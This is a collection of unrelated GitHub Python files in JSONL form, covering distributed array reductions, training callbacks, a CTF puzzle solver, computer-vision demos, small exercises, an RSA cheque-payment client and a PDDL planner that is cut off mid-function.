two-stage reduction. First, a partial\n reduction is performed node-local that is combined into a global reduction result via an MPI_Op.\n\n Parameters\n ----------\n x : ht.DNDarray\n The heat DNDarray on which to perform the reduction operation\n\n partial_op: function\n The function performing a partial reduction on the process-local data portion, e.g. sum() for implementing a\n distributed mean() operation.\n\n reduction_op: mpi4py.MPI.Op\n The MPI operator for performing the full reduction based on the results returned by the partial_op function.\n\n neutral: scalar\n Neutral element, i.e. an element that does not change the result of the reduction operation. Needed for\n those cases where 'x.gshape[x.split] < x.comm.rank', that is, the shape of the distributed tensor is such\n that one or more processes will be left without data.\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the result of the reduction operation\n\n Raises\n ------\n TypeError\n If the input or optional output parameter are not of type ht.DNDarray\n ValueError\n If the shape of the optional output parameters does not match the shape of the reduced result\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n\n # no further checking needed, sanitize axis will raise the proper exceptions\n axis = stride_tricks.sanitize_axis(x.shape, kwargs.get(\"axis\"))\n if isinstance(axis, int):\n axis = (axis,)\n keepdim = kwargs.get(\"keepdim\")\n out = kwargs.get(\"out\")\n split = x.split\n balanced = x.balanced\n\n # if local tensor is empty, replace it with the identity element\n if 0 in x.lshape and (axis is None or (x.split in axis)):\n if neutral is None:\n neutral = float(\"nan\")\n neutral_shape = x.gshape[:split] + (1,) + x.gshape[split + 1 :]\n partial = torch.full(\n neutral_shape,\n fill_value=neutral,\n dtype=x.dtype.torch_type(),\n device=x.device.torch_device,\n )\n else:\n partial = x.larray\n\n # apply the partial reduction operation to the local tensor\n if axis is None:\n partial = partial_op(partial).reshape(-1)\n output_shape = (1,)\n balanced = True\n else:\n output_shape = x.gshape\n for dim in axis:\n partial = partial_op(partial, dim=dim, keepdim=True)\n output_shape = output_shape[:dim] + (1,) + output_shape[dim + 1 :]\n if not keepdim and not len(partial.shape) == 1:\n gshape_losedim = tuple(x.gshape[dim] for dim in range(len(x.gshape)) if dim not in axis)\n lshape_losedim = tuple(x.lshape[dim] for dim in range(len(x.lshape)) if dim not in axis)\n output_shape = gshape_losedim\n # Take care of special cases argmin and argmax: keep partial.shape[0]\n if 0 in axis and partial.shape[0] != 1:\n lshape_losedim = (partial.shape[0],) + lshape_losedim\n if 0 not in axis and partial.shape[0] != x.lshape[0]:\n lshape_losedim = (partial.shape[0],) + lshape_losedim[1:]\n if len(lshape_losedim) > 0:\n partial = partial.reshape(lshape_losedim)\n # perform a reduction operation in case the tensor is distributed across the reduction axis\n if x.split is not None and (axis is None or (x.split in axis)):\n split = None\n balanced = True\n if x.comm.is_distributed():\n x.comm.Allreduce(MPI.IN_PLACE, partial, reduction_op)\n\n ARG_OPS = [statistics.MPI_ARGMAX, statistics.MPI_ARGMIN]\n arg_op = False\n if reduction_op in ARG_OPS:\n arg_op = True\n partial = partial.chunk(2)[-1].type(torch.int64)\n if partial.ndim > 1:\n partial = partial.squeeze(dim=0)\n\n # if reduction_op is a Boolean operation, then resulting tensor is bool\n tensor_type = bool if reduction_op in __BOOLEAN_OPS else partial.dtype\n\n if out is not None:\n # sanitize out\n sanitation.sanitize_out(out, output_shape, split, x.device)\n if arg_op and out.dtype != types.canonical_heat_type(partial.dtype):\n raise TypeError(\n \"Data type mismatch: out.dtype should be {}, is {}\".format(\n types.canonical_heat_type(partial.dtype), out.dtype\n )\n )\n out._DNDarray__array = partial\n return out\n\n return dndarray.DNDarray(\n partial,\n output_shape,\n types.canonical_heat_type(tensor_type),\n split=split,\n device=x.device,\n comm=x.comm,\n balanced=balanced,\n )\n","repo_name":"coquelin77/icml-repo","sub_path":"heat/core/_operations.py","file_name":"_operations.py","file_ext":"py","file_size_in_byte":17304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21479374916","text":"import pytorch_lightning as pl\n\nclass PyLoggerCallback(pl.callbacks.Callback):\n\tdef __init__(self, logger, **kwargs):\n\t\tsuper(PyLoggerCallback, self).__init__(**kwargs)\n\t\tself.logger = logger\n\n\tdef on_epoch_start(self, trainer, pl_module):\n\t\tmsg = 'Processing Epoch {}'.format(trainer.current_epoch+1)\n\t\tself.logger.info(msg)\n\n\tdef on_epoch_end(self, trainer, pl_module):\n\t\tmsg = 'Epoch {} - Train Loss: {:.6f}, Val Loss: {:.6f}, Val Score: {:.6f}'.format(\n\t\t\ttrainer.current_epoch+1,\n\t\t\tpl_module.stat['train']['loss'][-1],\n\t\t\tpl_module.stat['validation']['loss'][-1],\n\t\t\tpl_module.stat['validation']['jaccard_score'][-1]\n\t\t)\n\t\tself.logger.info(msg)","repo_name":"ywu94/Code-Notes","sub_path":"HuggingFace-TSE/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"35434134587","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom z3 import *\r\n\r\nBASE_URL = 'http://175.118.127.123:5000'\r\n\r\nteams = '''zer0cats\r\nCheckTheSign\r\nC4T BuT M3W\r\nidk\r\nkalmaronion\r\nHikeBoy\r\njustCatchTheFish\r\nr3kabunny\r\nSNSD\r\norgani-cats\r\nthequackerscrew\r\n1daysober\r\nMore Fried Elite Duck\r\nBlack Butterflies\r\nProject Sakura\r\nQQQ\r\nShyKOR\r\nGoose N\r\nMINUS\r\nBalsamic Vinegar\r\nNever Stop Exploding\r\nDiceDang\r\nThe Round Network Society\r\n796e74\r\nThe Moose\r\nUpper Guesser\r\nHackingForBeer\r\nWaffle Bacon\r\nChordBlue\r\nmhackaroni\r\nWatermelon Paddler\r\nPerfect Pink\r\nKatzekatbin\r\nThe Quack\r\nShellfish\r\nDragon Sushi\r\nEmu Eggs Benny\r\nYGY\r\nOsakaWesterns\r\nPolygroot\r\nDragon Vector\r\nLCDC\r\n127\r\nEat, Sleep, Misc, Repeat\r\nNu0L\r\no0ps\r\nBubble Tea Deliverers\r\nDashwhackers\r\nA*C*E\r\nCloseToAll\r\nDeficit\r\nsquareimentary\r\ndaejeonelectricdecomposer\r\nnone2root\r\nInverselab\r\nEver Stop Exploiting\r\ncopyn\r\nSunBugs\r\nFBISEC\r\ndefined\r\nNEWSEC'''.split('\\n')\r\n\r\ndef parse_challenges(teamname):\r\n url = BASE_URL + '/team/' + teamname\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n li_tags = soup.find_all('li')\r\n challs = []\r\n for li in li_tags:\r\n if li.text:\r\n challs.append(li.text)\r\n return challs\r\n\r\n\r\ndef get_rank_list():\r\n url = BASE_URL + '/scoreboard_requested'\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n li_tags = soup.find_all('li')\r\n ranks = []\r\n for li in li_tags:\r\n if li.text:\r\n ranks.append(li.text)\r\n return ranks\r\n\r\n\r\ndef find_solution():\r\n vars = [Int(f'var{i}') for i in range(len(teams))]\r\n eqs = []\r\n for team in ranks:\r\n eq = 0\r\n for chal in team_solved[team]:\r\n eq += vars[occur[chal]-1]\r\n eqs.append(eq)\r\n \r\n z = Solver()\r\n z.add(vars[-1] > 0)\r\n z.add(vars[0] < 10**9)\r\n for i in range(len(teams)-1):\r\n z.add(eqs[i] > eqs[i+1])\r\n z.add(vars[i] > vars[i+1])\r\n \r\n if z.check() == sat:\r\n model = z.model()\r\n ret = []\r\n for var in vars:\r\n ret.append(model[var].as_long())\r\n print(ret)\r\n \r\n else:\r\n print(\"unsat\")\r\n exit(-1)\r\n\r\n return ret\r\n\r\ndef send_query(sol):\r\n url = BASE_URL + '/check'\r\n data = {}\r\n for i in range(len(teams)):\r\n data[f\"input{i+1}\"] = str(sol[i])\r\n \r\n resp = requests.post(url, data=data)\r\n t = resp.text\r\n if \"WACON\" not in t:\r\n print(\"nono..\")\r\n else:\r\n i1 = t.find(\"WACON\")\r\n i2 = t.find(\"}\")\r\n print(t[i1:i2+1])\r\n\r\nteam_solved = {}\r\noccur = {}\r\n\r\nfor team in teams:\r\n team_solved[team] = parse_challenges(team)\r\n for chal in team_solved[team]:\r\n if chal not in occur:\r\n occur[chal] = 0\r\n occur[chal] += 1\r\n\r\nranks = get_rank_list()\r\n#print(ranks)\r\n#exit()\r\n\r\nprint(\"Parse done\")\r\n\r\nprint(\"z3 gogo\")\r\nsol = find_solution()\r\nsend_query(sol)\r\n","repo_name":"encrypted-def/my-ctf-challenges","sub_path":"2023/WACON Quals/[misc] let-me-win/solution/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"2396641351","text":"import cv2\r\nimport cvzone\r\nfrom cvzone.HandTrackingModule import HandDetector\r\nimport time\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,640)\r\ncap.set(4,480)\r\ndetector = HandDetector(maxHands=1)\r\ntimer = 0\r\nstateResult = False\r\nstartGame =False\r\nscores = [0,0] #[ai,player]\r\n\r\n\r\n\r\n\r\nwhile True:\r\n imgBG = cv2.imread(\"Resources\\BG.png\")\r\n success, img = cap.read()\r\n imgscaled = cv2.resize(img,(0,0),None,0.875,0.875)\r\n #Cropping the image to fit properly in the bg template\r\n imgscaled = imgscaled[:,80:480] #first slice value is height and second one is width\r\n\r\n # Findhands\r\n hands, img = detector.findHands(imgscaled)\r\n\r\n if startGame:\r\n if stateResult is False:\r\n timer = time.time() - initialTime\r\n cv2.putText(imgBG, str(int(timer)), (605, 435), cv2.FONT_HERSHEY_PLAIN, 6, (255, 0, 255), 4)\r\n\r\n if timer >3:\r\n stateResult = True\r\n timer = 0\r\n if hands:\r\n playerMove = None\r\n hand = hands[0]\r\n fingers = detector.fingersUp(hand)\r\n if fingers == [0, 0, 0, 0, 0]:\r\n playerMove = 1\r\n if fingers == [1, 1, 1, 1, 1]:\r\n playerMove = 2\r\n if fingers == [0, 1, 1, 0, 0]:\r\n playerMove = 3\r\n\r\n randomNumber = np.random.randint(1, 3)\r\n imgAI = cv2.imread(f'Resources/{randomNumber}.png', cv2.IMREAD_UNCHANGED)\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (149, 310))\r\n\r\n # Player Wins\r\n if (playerMove == 1 and randomNumber == 3) or \\\r\n (playerMove == 2 and randomNumber == 1) or \\\r\n (playerMove == 3 and randomNumber == 2):\r\n scores[1] += 1\r\n\r\n # AI Wins\r\n if (playerMove == 3 and randomNumber == 1) or \\\r\n (playerMove == 1 and randomNumber == 2) or \\\r\n (playerMove == 2 and randomNumber == 3):\r\n scores[0] += 1\r\n\r\n #putting the camera feed onto the BG image\r\n imgBG[234:654, 795:1195] = imgscaled\r\n\r\n if stateResult:\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (149, 310))\r\n cv2.putText(imgBG, str(scores[0]), (410, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n cv2.putText(imgBG, str(scores[1]), (1112, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n\r\n\r\n # cv2.imshow('image',img)\r\n # cv2.imshow('scaled', imgscaled)\r\n cv2.imshow('imgBG', imgBG)\r\n key = cv2.waitKey(1)\r\n if key == ord('s'):\r\n startGame = True\r\n initialTime = time.time()\r\n stateResult = False","repo_name":"riyazmuthyalapati/OpenCV_Rock_Paper_Sessicor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38991672855","text":"#Camryn Moschitta\n#CS175L\n\n#Calculate average and grade with functions\n\n\n\ndef determine_grade(total):\n if total<=100 and total>=90:\n return 'A'\n elif total<=89 and total>=80:\n return 'B'\n elif total<=79 and total>=70:\n return 'C'\n elif total<=69 and total>=60:\n return 'D'\n else:\n return'F'\n\ndef calc_average():\n answer1=float(input(\"Enter score 1: \"))\n answer2=float(input(\"Enter score 2: \"))\n answer3=float(input(\"Enter score 3: \"))\n answer4=float(input(\"Enter score 4: \"))\n answer5=float(input(\"Enter score 5: \"))\n avg=(answer1+answer2+answer3+answer4+answer5)/5\n return answer1, answer2, answer3, answer4, answer5, avg\n\ndef main():\n repeat='yes'\n while repeat=='yes':\n answer1, answer2, answer3, answer4, answer5, avg=calc_average()\n determine_grade(answer1)\n determine_grade(answer2)\n determine_grade(answer3)\n determine_grade(answer4)\n determine_grade(answer5)\n print(f'{\"Score\":<15}',f'{\"Numeric Grade Letter Grade\"}')\n print(\"-------------------------------------------\")\n print(f'{\"Score 1:\":<15}',f'{answer1:<13}',f'{determine_grade(answer1)}')\n print(f'{\"Score 2:\":<15}',f'{answer2:<13}',f'{determine_grade(answer2)}')\n print(f'{\"Score 3:\":<15}',f'{answer3:<13}',f'{determine_grade(answer3)}')\n print(f'{\"Score 4:\":<15}',f'{answer4:<13}',f'{determine_grade(answer4)}')\n print(f'{\"Score 5:\":<15}',f'{answer5:<13}',f'{determine_grade(answer5)}')\n print(f'{\"Average score:\":<15}',f'{avg:<13}',f'{determine_grade(avg)}')\n repeat=input(\"Enter 'yes' if you would like to do another calculation: \")\n\nmain()\n\n","repo_name":"Camrynluna/CS175L-01","sub_path":"Average and Grade.py","file_name":"Average and Grade.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11755743062","text":"import numpy as np\nfrom exercise_2 import *\nimport PIL\nfrom typing import List\nimport matplotlib.pyplot as plt\n\n###############\n# Problem 3.1 #\n###############\n\ndef return_A_b(vx_N, vt_N, vy_N):\n vx_N = np.reshape(vx_N, (-1, 1))\n vy_N = np.reshape(vy_N, (-1, 1))\n vt_N = np.reshape(vt_N, (-1, 1))\n\n A = np.hstack((vx_N, vy_N))\n return A, vt_N\n\n\ndef setup_equation_2(N: int, height:int, width:int, frame: int,\n Vx: np.ndarray, Vy: np.ndarray, Vt: np.ndarray, \n offset_x: int, offset_y: int) -> List[np.ndarray]:\n \"\"\"\n Args: \n N (int): the size of the cutout\n height (int): the height of the image\n width (int): the width of the image\n frame (int): the frame in the video \n Vx (np.ndarray): the x-gradients\n Vy (np.ndarray): the y-gradients\n Vt (np.ndarray): the time-gradients\n offset_x (int): the starting x of the cutout\n offset_y (int): the starting y of the cutout\n\n Returns:\n The matrix A and vector b in equation (2)\n \"\"\"\n # Generate subsets of Vx, Vy, Vz\n V_x_N = Vx[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n V_y_N = Vy[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n V_t_N = Vt[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n\n # Generate A and b\n\n V_x_N = np.reshape(V_x_N, (-1, 1))\n V_y_N = np.reshape(V_t_N, (-1, 1))\n V_t_N = np.reshape(V_t_N, (-1, 1))\n\n A = np.hstack((V_x_N, V_y_N))\n b = V_t_N\n\n return A, b\n\n\ndef solve_least_squares(A: np.ndarray, b: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n A (np.ndarray): the system matrix\n b (np.ndarray): the right hand side\n \n Returns\n The least squares solution to Ax = b\n \"\"\"\n m, c = np.linalg.lstsq(A, b)[0]\n return m, c\n\ndef loop_image(images: np.ndarray, interval: int, N: int):\n depth, height, width = images.shape\n # ensure N is odd.\n if N%2 == 0:\n N +=1\n \n Vt = calculate_Vt_SGF(images) #(64,255,255)\n Vx = calculate_Vx_SGF(images, depth) #(64,255,255)\n Vy = calculate_Vy_SGF(images, depth) #(64,255,255)\n\n print(\"shape vt\" + str(Vt.shape))\n print(\"shape vx\" + str(Vx.shape))\n print(\"shape vy\" + str(Vy.shape))\n\n x_sol = np.zeros((depth,height,width)) \n y_sol = np.zeros((depth,height,width))\n\n for frame in range(depth-1):\n for j in range(N//2, width, interval):\n for k in range(N//2, height, interval):\n #setup_equation_2(N, height, width, frame, Vx, Vy, Vt, x_offset, y_offset)\n V_x_N = Vx[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n V_y_N = Vy[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n V_t_N = Vt[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n print(\"vxN\")\n print(V_x_N.shape)\n A,b = return_A_b(V_x_N, V_t_N, V_y_N)\n print(\"A\")\n print(A.shape)\n print(\"b\")\n print(b.shape)\n print(\"\\n\\n\")\n res1, res2 = solve_least_squares(A, b)\n x_sol[frame, j, k] = res1[0]\n y_sol[frame, j, k] = res2[0]\n \n return x_sol, y_sol\n\n\n# Save images to array\nimages = []\nfor i in range(1, 4):\n num = str(i) if i >= 10 else \"0\" + str(i)\n image = PIL.Image.open(f\"./toyProblem_F22/frame_{num}.png\").convert(\"L\")\n images.append(np.asarray(image, dtype=np.float32)/255)\n\n# Convert list of images to np format\nimages = np.asarray(images)\ndepth, height, width = images.shape\n\n# Vx = calculate_Vx_SGF(images, depth)\n# Vy = calculate_Vy_SGF(images, depth)\n# Vt = calculate_Vt_SGF(images)\n\n# N = 5\n# x_offset = 40\n# y_offset = 40\n# frame = 0\n# A, b = setup_equation_2(N, height, width, frame, Vx, Vy, Vt, x_offset, y_offset)\n\n# print(A.shape)\n# print(b.shape)\n# sol1, sol2 = solve_least_squares(A, b)\n# print(\"\\n\\nsol = \" + str(sol1) + \",\" + str(sol2))\n\n# fig, ax = plt.subplots()\n# the_image = ax.imshow(\n# images[frame], cmap=\"gray\"\n# )\n# # X, Y = np.mgrid[]\n# plt.show()\n\n# Problem 3.2\nx, y = loop_image(images, 50, 3)\nprint(x.shape)\nprint(y.shape)\nprint(x[2,:,:])\nprint(y[2,:,:])\n","repo_name":"ElMiho/02526-mathematical-modeling-project-1","sub_path":"code/exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"30838842380","text":"import sys\r\nimport os\r\nassert(len(sys.argv) == 2)\r\n\"\"\"Usage:\r\n python this_file.py 0.2435\r\n\"\"\"\r\n\r\ninteger = \"0.\"\r\nfraction = float(sys.argv[1])\r\n\r\nwhile fraction:\r\n fraction *= 2\r\n integer += str(int(fraction // 1))\r\n fraction -= fraction // 1\r\n print(integer, fraction)\r\n","repo_name":"MingSun-Tse/Scripts","sub_path":"Python/float2bin.py","file_name":"float2bin.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8441942817","text":"from test2 import worker\nimport multiprocessing\nif __name__ == '__main__':\n manager = multiprocessing.Manager()\n return_dict = manager.dict()\n jobs = []\n temp=[1,2]\n for i in temp:\n p = multiprocessing.Process(target=worker, args=(i,return_dict))\n jobs.append(p)\n p.start()\n for proc in jobs:\n proc.join()\n print(return_dict.values())","repo_name":"Sumitkchoubey/QuestionAnsweringsystem","sub_path":"question_answer/utils/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38390780839","text":"import socket\nimport hashlib\nimport random\nimport rsa\nfrom base64 import b64encode, b64decode\nimport urllib\nimport urllib.parse, urllib.request\nimport json\nimport requests\nimport datetime\nfrom Crypto.PublicKey import RSA\nimport binascii\nimport time\nimport sys\n\ndef pause():\n try:\n input('Press enter to continue...')\n except SyntaxError:\n pass\n\ndef bin2hex(binStr):\n return binascii.hexlify(binStr)\n\ndef hex2bin(hexStr):\n return binascii.unhexlify(hexStr)\n\ndef send(txt):\n return s.send(txt.encode('utf-8'))\ndef recv():\n return s.recv(listen_port).decode('utf-8')\n\namnt_to_send = 1 # TODO: This should be chosen by the user!\n\n# FIXME: This is where I would split/combine coins if needed\n\ncheque_amnt, coin_public_key_hex, coin_nonce, coin_private_key_hex = (None, None, None, None,)\nwith open('private_coin_storage.txt', 'r') as f:\n for line in f:\n cheque_amnt, coin_public_key_hex, coin_nonce, coin_private_key_hex = f.readline().rstrip().split('\\t')\n\n if cheque_amnt == amnt_to_send:\n break # We'll use this cheque\n\n# In case we didn't find a coin...\nif cheque_amnt is None:\n print('Coin not found!')\n sys.exit(1)\n\ncheque_str = '_'.join((cheque_amnt, coin_public_key_hex, coin_nonce,))\n\ncoin_private_key = RSA.importKey(hex2bin(coin_private_key_hex))\n\nbank_url = 'http://104.199.121.149:8228'\n\ns = socket.socket()\nhost = '104.199.121.149'\nport = 1247\ns.connect((host, port))\n\nprint('connected')\n\nlisten_port = 1024\n\n# Make sure that I'm connected\nassert recv() == 'awk.init'\nprint('awk.init')\n\n# Make the public key sharable\npublic_key_b64 = b64encode(hex2bin(coin_public_key_hex)).decode('utf-8')\nprint('Share this Base64 public key with the payee: ')\nprint(public_key_b64)\n\n# Announce who I am to the server\nprint('Connecting to server...')\n\n# (Sign the timestamp to verify I own the key)\ntimestamp = str(time.time())\nsignature = b64encode(rsa.sign(timestamp.encode('utf-8'), coin_private_key, 'SHA-256')).decode('utf-8')\n\n# (Send public key along with signed timestamp as proof)\nsend(public_key_b64)\nassert recv() == 'recv.public_key_b64'\n\nsend(timestamp)\nassert recv() == 'recv.timestamp'\n\nsend(signature)\nassert recv() == 'recv.signature'\n\nassert recv() == 'awk.sig'\n\nprint('Connected')\n\nsend('protocol.payer.download_cheque')\nassert recv() == 'awk.protocol.payer.download_cheque'\n\nsend('awk.ready')\n\nencrypted_cheque_str = recv()\n\nif encrypted_cheque_str == 'None':\n print('The payer has not send his/her request yet. Please try again in a few minutes.')\n print('Payment cancelled.')\n print()\n print('Next time, run this command with the -s flag.')\n sys.exit(1)\n\n# Decrypt the cheque\npayee_cheque_str = rsa.decrypt(b64decode(encrypted_cheque_str), coin_private_key).decode('utf-8')\n\n# Sign the cheque\nsignature_b64 = b64encode(rsa.sign(payee_cheque_str.encode('utf-8'), coin_private_key, 'SHA-256')).decode('utf-8')\n\n# Send it to the Bank\nresponse = requests.post(bank_url+'/replace', json={\n 'old_cheque_raw': cheque_str,\n 'new_cheque': payee_cheque_str,\n 'signature_b64': signature_b64\n})\n\nif response.text == 'True':\n print('Payment successful.')\nelse:\n print('Error: ')\n print(response.text)\n","repo_name":"B-Rich/WoodenNickle","sub_path":"send_step2.py","file_name":"send_step2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20106334272","text":"from tkinter import *\n\nroot=Tk()\n\nF1=Frame(root,bg='yellow')\n\nL1=Label(F1,text=\"LABEL 1\",fg='green',bg='orange')\nL2=Label(F1,text=\"LABEL 2\",fg='brown',bg='red')\nL3=Label(F1,text=\"LABEL 3\",fg='red',bg='purple')\nL4=Label(F1,text=\"LABEL 4\",fg='blue',bg='pink')\n\nL1.pack()\nL2.pack(fill='x')\nL3.pack(side=LEFT,fill='y')\nL4.pack()\n\nF1.pack()\n\nF2=Frame(root,bg='yellow',bd=100)\n\nL5=Label(root,text=\"LABEL 5\",bd=10,fg='green',bg='orange') #for fill axis label and wigth present on window not fon frame\nL6=Label(root,text=\"LABEL 6\",fg='brown',bg='red')\nL7=Label(root,text=\"LABEL 7\",fg='red',bg='purple')\nL8=Label(root,text=\"LABEL 8\",fg='blue',bg='pink')\n\nL5.pack()\nL6.pack(fill='x')\nL7.pack(side=LEFT,fill='y')\nL8.pack()\n\nF1.pack()\n\nroot.mainloop()\n","repo_name":"PrateekJain999/Python-Codes","sub_path":"GUI/Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"3262821172","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.rcParams['figure.figsize'] = (20, 10)\n\nfig, axes = plt.subplots(nrows = 2, ncols = 4)\naxes[-1, -1].axis('off')\n\ndf = pd.read_csv(\"data\\world-happiness-report-2021.csv\")\nprint(df.columns)\n\nfeatures = [\"Ladder score\", \"Logged GDP per capita\", \"Social support\", \"Healthy life expectancy\", \"Freedom to make life choices\", \"Generosity\", \"Perceptions of corruption\"]\nxaxes = features\nyaxes = [\"Counts\"] * 7\n\n#flatten array of axes\naxes = axes.ravel()\nfor idx, ax in enumerate(axes[:-1]):\n\tax.hist(df[features[idx]].dropna(), bins = 30)\n\tax.set_xlabel(xaxes[idx], fontsize=20)\n\tax.set_ylabel(yaxes[idx], fontsize=20)\n\tax.tick_params(axis='both', labelsize=15)\n\t\nplt.show()\n\n","repo_name":"Justin-DeTone/data-science_world-happiness","sub_path":"histograms.py","file_name":"histograms.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14844605407","text":"#!/usr/bin/env python\nfrom pprint import pprint \n\n\nfrom mod_python import apache\n\ndb = apache.import_module('db/redisdb')\n\ndef index(req):\n method = req.method\n \n # Method specific actions\n if method == \"POST\":\n # Extract HTTP form data\n data = req.form\n\n action = data['action']\n object_id = data['id']\n object_type = data['type']\n geo_data = data['data']\n\n # Map object actions \n if action == \"create\":\n db.createObject(id=object_id, \n type=object_type,\n data=geo_data)\n \n elif action == \"delete\":\n db.deleteObject(id=object_id)\n \n \n elif action == \"edit\":\n db.updateObject(id=object_id, \n type=object_type,\n data=geo_data)\n \n return \"POST OK\"\n\n\n elif method == \"GET\":\n response_data = db.getObjects()\n return response_data\n","repo_name":"wilsonc101/R.Pi_Rover","sub_path":"adaptors/offline-mapping/server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"23357748024","text":"import re\nifin = input('Enter file name:')\nfname = open(ifin)\nregex = input('Input a regular expression to match:\\n')\nilist = list()\nfor line in fname:\n\tline = line.rstrip()\n\ty = re.findall(regex,line)\n\tif len(y) > 0:\n\t\tilist = ilist + y\nprint(ifin,'had',len(ilist),'lines that matched', regex )\n","repo_name":"jbk0th/Using-Python-to-Access-web-Data","sub_path":"Regex_1.py","file_name":"Regex_1.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18129461244","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport helpers\n\nimg = cv2.imread('resources/internal_external.png', 0)\n\nhelpers.implot(img)\n\nimage, cntrs, hierarchy = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\next_cons = np.zeros(image.shape)\n\nfor i in range(len(cntrs)):\n if(hierarchy[0][i][3]) == -1: cv2.drawContours(ext_cons, cntrs, i, 255, -1)\n\nhelpers.implot(ext_cons)\n\nint_cons = np.zeros(image.shape)\n\nfor i in range(len(cntrs)):\n if (hierarchy[0][i][3]) != -1: cv2.drawContours(int_cons, cntrs, i, 255, -1)\n\nhelpers.implot(int_cons)\n","repo_name":"zarev/cv-course","sub_path":"cv-course/06-05-contour-detect.py","file_name":"06-05-contour-detect.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4385000394","text":"from pddl_parser import PddlParser\nimport copy\n\nclass Planner:\n def __init__(self, domain_file_name, problem_file_name):\n # Parser\n self.parser = PddlParser()\n self.parser.parse_domain(domain_file_name)\n self.parser.parse_problem(problem_file_name)\n self.action_state = {} # An\n self.all_possible_actions = []\n self.generate_all_available_actions()\n self.states = {0: set(tuple(state + [0]) for state in self.parser.state)}\n self.g_node = 0\n\n def generate_all_available_actions(self):\n for action in self.parser.actions:\n for possible_act in action.groundify(self.parser.objects):\n self.all_possible_actions.append(possible_act)\n\n @staticmethod\n def applicable(state, precondition):\n return any([set(precondition).issubset(set(item)) for item in state])\n\n def relaxation_plan(self):\n current_state = 0 # S0\n while True:\n temp_state = self.states[current_state].copy()\n possible_actions = set()\n for action in self.all_possible_actions:\n action_flag = True\n pre_cond = action.positive_preconditions\n for precondition in pre_cond:\n if not self.applicable(self.states[current_state], precondition):\n action_flag = False\n break\n if action_flag:\n for precondition in pre_cond:\n # find the precondition in temp_state\n state_from_temp_state = \\\n [item for item in temp_state if set(precondition).issubset(set(item))][0]\n action.weight += state_from_temp_state[len(state_from_temp_state) - 1]\n action.weight += 1\n\n for effect in action.add_effects:\n # check effect exists already in state\n if any([set(effect).issubset(set(item)) for item in temp_state]):\n state_from_temp_state = [item for item in temp_state if set(effect).issubset(set(item))][0]\n if state_from_temp_state[len(state_from_temp_state) - 1] > action.weight:\n temp_state.remove(state_from_temp_state)\n temp_state.add(state_from_temp_state[:len(state_from_temp_state) - 1] +\n (action.weight,))\n else:\n temp_state.add(effect + (action.weight,))\n possible_actions.add(copy.deepcopy(action))\n\n if temp_state == self.states[current_state] or len(possible_actions) == 0:\n break\n else:\n self.action_state[current_state] = possible_actions\n current_state += 1\n self.states[current_state] = temp_state\n self.calculate_g_node(current_state)\n\n if self.g_node == 0:\n print(\"I could not succeed all goals\")\n self.write_actions_states_occurred(current_state)\n\n def calculate_g_node(self, current_state):\n succeeded_goals = ([item for goal in self.parser.positive_goals for item in self.states[current_state] if\n set(goal).issubset(set(item))])\n if len(self.parser.positive_goals) == len(succeeded_goals) and self.g_node == 0:\n for _succeeded_goal in succeeded_goals:\n self.g_node += _succeeded_goal[len(_succeeded_goal) - 1]\n\n def 